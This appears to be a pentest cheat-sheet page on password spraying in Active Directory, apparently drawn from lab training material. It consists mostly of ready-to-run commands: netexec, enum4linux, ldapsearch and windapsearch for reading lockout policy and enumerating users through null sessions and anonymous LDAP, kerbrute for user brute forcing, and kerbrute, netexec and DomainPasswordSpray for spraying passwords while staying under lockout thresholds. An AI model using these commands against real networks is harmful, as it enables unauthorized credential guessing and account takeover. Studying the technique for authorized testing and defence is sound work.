search
SecurityVulnerabilityTerminalCode

Password Spraying Attack

Try single passwords on all users, less chance of lockout.

hashtag
Policy Password

Important to obtain password policy, with:

Lockout threshold

Possible attempts before being blocked

Lockout duration

Duration of the block

Lockout observation window

After how long does the reset of attempts occur

hashtag
Locally

net accounts
Get-ADDefaultDomainPasswordPolicy

hashtag
Remotely

Tool
Details

netexecarrow-up-right

nxc smb <IP> -u <USER> -p <PASS> --pass-pol

enum4linuxarrow-up-right

enum4linux -u <USER> -p <PASS> -P <IP>

hashtag
Null Session SMB

Tool
Details

netexecarrow-up-right

nxc smb <IP> --pass-pol

enum4linuxarrow-up-right

enum4linux -P <IP>

hashtag
LDAP Anonymous Binds

Tool
Details

ldapsearcharrow-up-right

ex. INLANEFREIGHT.LOCAL ldapsearch -H ldap://<IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

hashtag
Find Usernames

hashtag
Locally

hashtag
Remotely

Tool
Details

netexecarrow-up-right

nxc smb <IP> -u <USER> -p <PASS> --users --rid-brute

enum4linuxarrow-up-right

enum4linux -u <USER> -p <PASS> -U <IP>

hashtag
Null Session SMB

Tool
Details

netexecarrow-up-right

nxc smb <IP> --users

enum4linuxarrow-up-right

enum4linux -U <IP>

hashtag
LDAP Anonymous Binds

Tool
Details

ldapsearcharrow-up-right

ex. INLANEFREIGHT.LOCAL ldapsearch -h <IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f 2 -d " "

windapsearcharrow-up-right

windapsearch.py --dc-ip <IP> -u "" -U

hashtag
Brute Force

Tool
Details

kerbrutearrow-up-right

Use Kerberos Pre-Authenticationarrow-up-right to enumerate users via brute force (no login errors and no lockouts). kerbrute userenum -d <DOMAIN> --dc <IP_DC> <WORDLIST>

hashtag
Spraying Attack

Tool
Details

kerbrutearrow-up-right

This method is based on obtaining TGT for credential verification. The advantage is that it uses only two UDP frames (sends REQ-TGT and examines the response) kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> <USERS_LIST> <PASS> If you receive a network error, make sure that the encoding of wordlist is ANSI. You can use Notepad's Save As functionality to change the encoding.

netexecarrow-up-right

This method uses the SMB protocol to verify credentials (more traffic and slower). nxc smb <IP> -u <USERS_LIST> -p <PASS1> <PASS2> -d <DOMAIN> --continue-on-success | grep +

DomainPasswordSprayarrow-up-right

From Windows, with the ability to extract the password policy itself (adapting the attack) and users if it is executed from hosts within the domain. Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -Password <PASS> -ErrorAction SilentlyContinue [-UserList <USERS> -Domain <DOMAIN>]

Last updated